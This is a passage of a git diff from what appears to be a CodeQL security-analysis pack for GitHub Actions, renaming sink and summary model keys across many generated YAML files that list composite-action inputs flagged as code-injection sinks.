extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97af..0bae4e91cde0 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a40..0acb53ba1d3a 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368e..f1b755e796b5 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039b..7d1733d647ac 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e83761..4bf33c9a343d 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff306..9ca004a7c155 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a7..fc3870d89a8e 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d94..1d621562771e 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a2..f09b364127e6 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a3..56e7b8142316 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0d..9f953b32ab17 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd4..257b77bc2c34 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e0..49f2f86907f9 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b65..1e33c5e540aa 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b43..cfbf15549c48 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae41..24730af3d77a 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed1603..6be5abd09dd7 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c4..145b6f0d0e3e 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb8..c8b05bfd904b 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7e..04c218a76c1b 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de4..5447d4b7e2ed 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aeff..825ce27511d7 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59ed..8f3e49c9768a 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d1760513..1937367debc7 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b787..01b77b7ccc6d 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83feb..edbd28d401bf 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae3049..4b31bd66c5a6 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b4482695..a186fa070b0b 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bddeb..92ee2971e3a2 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd7..07b8e96bfe29 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd0014586..2a2a5baab45d 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a90..274fab01e921 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc17..3671de9e58af 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a34784..2ef34dac8ba7 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c25..d76f20031e7e 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baaa..eccb5dae2bd7 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e6..3cbd3330ccd1 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf68..73c9c1f24a2b 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ffb..90c4f699308a 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e82..ed4e8820c998 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d167..df51b9fe4c84 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 87e88b2c13d5..8fca8591ceb6 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index c0789d6e4241..819728cf7187 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index f617b9d172d5..d3eaca780b40 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index f30719d58d8f..42c00ea216b4 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index 84d5c96e63b7..a93d6a039d43 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index d76ab136ab9c..8a7784a6f01e 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 9e75660d1b3b..1b22d43bfad8 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 1cc6e837b840..7175dd9450b4 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index b2e283c69830..dca0f00a4ec8 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ 